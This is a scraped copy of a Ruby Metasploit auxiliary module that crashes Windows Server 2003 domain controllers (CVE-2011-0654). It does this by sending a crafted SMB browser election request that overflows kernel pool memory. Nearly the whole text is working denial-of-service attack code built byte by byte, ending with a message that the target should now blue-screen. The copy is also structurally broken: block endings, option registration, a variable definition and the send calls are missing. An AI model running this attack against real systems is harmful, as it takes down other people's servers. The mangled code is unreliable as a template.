174 lines
5.5 KiB
174 lines
5.5 KiB
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
#include Msf::Exploit::Remote::SMB::Client
include Auxiliary::Dos
def initialize(info = {})
'Name' => 'Microsoft Windows Browser Pool DoS',
'Description' => %q{
This module exploits a denial of service flaw in the Microsoft
Windows SMB service on versions of Windows Server 2003 that have been
configured as a domain controller. By sending a specially crafted election
request, an attacker can cause a pool overflow.
The vulnerability appears to be due to an error handling a length value
while calculating the amount of memory to copy to a buffer. When there are
zero bytes left in the buffer, the length value is improperly decremented
and an integer underflow occurs. The resulting value is used in several
calculations and is then passed as the length value to an inline memcpy
Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and
causes considerable damage to kernel heap memory. While theoretically possible,
it does not appear to be trivial to turn this vulnerability into remote (or
even local) code execution.
'References' =>
[ 'CVE', '2011-0654' ],
[ 'BID', '46360' ],
[ 'OSVDB', '70881' ],
[ 'MSB', 'MS11-019' ],
[ 'EDB', '16166' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
'Author' => [ 'Cupidon-3005', 'jduck' ],
'License' => MSF_LICENSE
OptString.new('DOMAIN', [ true, "The name of the domain that the target controls" ])
def run
@client = Rex::Proto::SMB::Client.new(udp_sock)
ip = Rex::Socket.source_address(datastore['RHOST'])
ip_src = Rex::Socket.gethostbyname(ip)[3]
svc_src = "\x41\x41\x00" # pre-encoded?
name_src = Rex::Text.rand_text_alphanumeric(15) # 4+rand(10))
svc_dst = "\x42\x4f\x00" # pre-encoded?
name_dst = datastore['DOMAIN']
election =
"\x08" + # Election Request
"\x09" + # Election Version
"\xa8" + # election desire - Domain Master & WINS & NT
"\x0f" + # Browser Protocol Major Version
"\x01" + # Browser Protocol Minor Version
"\x20" + # Election OS (NT Server)
"\x1b\xe9\xa5\x00" + # Uptime
"\x00\x00\x00\x00" + # NULL... Padding?
#("A" * 4) + "\x00"
Rex::Text.rand_text_alphanumeric(410) + "\x00"
nbdghdr =
"\x11" + # DIRECT_GROUP datagram
"\x02" + # first and only fragment
[rand(0xffff)].pack('n') + # Transation Id (DGM_ID)
ip_src +
"\x00\x8a" + # Source Port (138)
"\x00\xa7" + # DGM_LENGTH, patched in after
"\x00\x00" # PACKET_OFFSET
nbdgs = nbdghdr +
half_ascii(name_src, svc_src) +
half_ascii(name_dst, svc_dst)
# A Trans request for the mailslot
nbdgs << trans_mailslot(pipe, '', election)
# Patch up the length (less the nb header)
nbdgs[0x0a, 2] = [nbdgs.length - nbdghdr.length].pack('n')
print_status("Sending specially crafted browser election request..")
#print_status("\n" + Rex::Text.to_hex_dump(nbdgs))
print_status("The target should encounter a blue screen error now.")
# Perform a browser election request using the specified subcommand, parameters, and data
def trans_mailslot(pipe, param = '', body = '')
# Null-terminate the pipe parameter if needed
if (pipe[-1,1] != "\x00")
pipe << "\x00"
pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct
setup_count = 3
setup_data = [1, 0, 2].pack('v*')
data = pipe + param + body
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset + pipe.length
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION
pkt['Payload']['SMB'].v['Flags1'] = 0x0
pkt['Payload']['SMB'].v['Flags2'] = 0x0
pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = data.length
pkt['Payload'].v['ParamCountMax'] = 0
pkt['Payload'].v['DataCountMax'] = 0
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset if param.length > 0
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Payload'] = data
exploit = pkt.to_s
# Strip off the netbios header (thx, but no thx!)
exploit[4, exploit.length - 4]
def half_ascii(name, svc)
ret = " "
name.unpack('C*').each { |byte|
ret << [0x41 + (byte >> 4)].pack('C')
ret << [0x41 + (byte & 0xf)].pack('C')
left = 15 - name.length
if left > 0
ret << "\x43\x41" * left
# In our case, svc is already encoded..
ret << svc